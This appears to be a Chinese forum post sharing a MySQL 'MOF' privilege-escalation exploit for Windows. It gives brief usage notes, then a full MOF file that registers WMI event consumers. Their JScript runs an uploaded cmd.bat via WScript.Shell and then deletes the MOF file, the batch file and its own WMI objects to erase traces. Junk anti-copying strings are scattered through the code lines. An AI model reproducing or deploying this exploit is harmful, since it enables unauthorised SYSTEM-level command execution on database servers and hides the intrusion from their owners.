Mysql 提权即时无错Mof exp

admin

这个sql提权MOF需要运行 system下的文件，不能定义路径。
需要将要运行的命令写入到bat上传到system32目录，然后执行。
% v0 j" D( ?9 G( z6 ~
这个sql提权MOF需要运行 system下的文件，不能定义路径。
需要将要运行的命令写入到bat上传到system32目录，然后执行。
9 R1 @* o: ]9 ?% m
#pragma
                        namespace("\\\\.\\root\\cimv2")
% o# w5 g2 `, z                        class
                        MyClass547
8 p" m3 ]  M' l( t                        {           [key]
                        string
                        Name;
                        };
                        class
                        ActiveScriptEventConsumer
8 E' l2 P% ~$ ^6 |6 e7 g8 l                        : __EventConsumer {          [key]
9 k; H: S$ m9 t                        string
/ [& }" y4 S0 b9 y+ b4 [6 J                        Name;           [not_null]
                        string
                        ScriptingEngine;           string
                        ScriptFileName;           [template]
6 c6 e; M; Q, w( d1 R! z                        string
) W& l) @( Y) p/ b% }5 T+ q                        ScriptText;         uint32 KillTimeout;
% O7 `7 y. a' |: Y/ |                        }; instance of __Win32Provider as $P {
                        Name
                        =
  _, S0 p( Z8 v' }1 D2 g% `$ Q                        "ActiveScriptEventConsumer";     CLSID =
# L8 h# q: |; l8 {* N( f) w% b  y                        "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
+ ?5 @- _8 x& W; L) `5 R: [                        PerUserInitialization
                        = TRUE;
7 Y, e, ~8 o9 U. n% o2 R. Y                        }; instance of __EventConsumerProviderRegistration {         Provider
                        = $P;         ConsumerClassNames
* B& Y# l+ @: F* Q3 K+ ?' i6 G                        =
                        {"ActiveScriptEventConsumer"};
8 k/ B1 x& I: Z) H- G                        };
* C4 Z( u) `+ c% @, p' M1 q                        Instance of ActiveScriptEventConsumer
8 U" o( l6 i5 P" L                        as $cons {         Name
                        =
* l: T: Q" D* @# {$ c( n5 r( I                        "ASEC";         ScriptingEngine
                        =
# s! `5 i. @( m* X. F                        "JScript";         ScriptText
                        =
) F1 ~. q/ e( T( b( [" Y                        "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";          };
' [  F; Q5 m& @  H4 n+ }/ S% z                        Instance of ActiveScriptEventConsumer
; t" m1 g; g; w; I                        as $cons2 {         Name
6 Q0 _9 m- M* A$ u7 I, g5 m                        =
! l' r! J8 Z% s% p3 t: i' o                        "qndASEC";         ScriptingEngine
                        =
: P2 L* j/ {/ Y; }0 }6 W! X                        "JScript";         ScriptText
                        =
                        "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
3 @( ]& p4 \5 e( `                        }; instance of __EventFilter as $Filt {         Name
                        =
  s; O" V0 M1 W0 g6 I                        "instfilt";         Query
                        =
; t7 ?- k' I$ O                        "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\"";         QueryLanguage
% T: _+ K7 P2 B* k& D! y! ~6 Y2 \                        =
9 f7 P: `* q- U+ T1 A9 V                        "WQL";         }; instance of __EventFilter as $Filt2 {         Name
                        =
                        "qndfilt";         Query
, {8 O3 n3 k; g( b0 z3 L, I) x                        =
+ H( L0 c: c7 G* @3 i                        "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\"";         QueryLanguage
& y' ^6 \) H. U1 B% Y, _. W                        =
                        "WQL";          }; instance of __FilterToConsumerBinding as $bind {         Consumer
                        = $cons;         Filter
                        = $Filt;
                        }; instance of __FilterToConsumerBinding as $bind2 {         Consumer
2 P6 y+ {2 _* L) t  A" c* [                        = $cons2;         Filter
                        = $Filt2;
                        }; instance of MyClass547
0 R- N3 F2 }4 x1 i* T/ W                        as $MyClass {         Name
                        =
9 Q  q3 |7 [) @                        "ClassConsumer";
                        };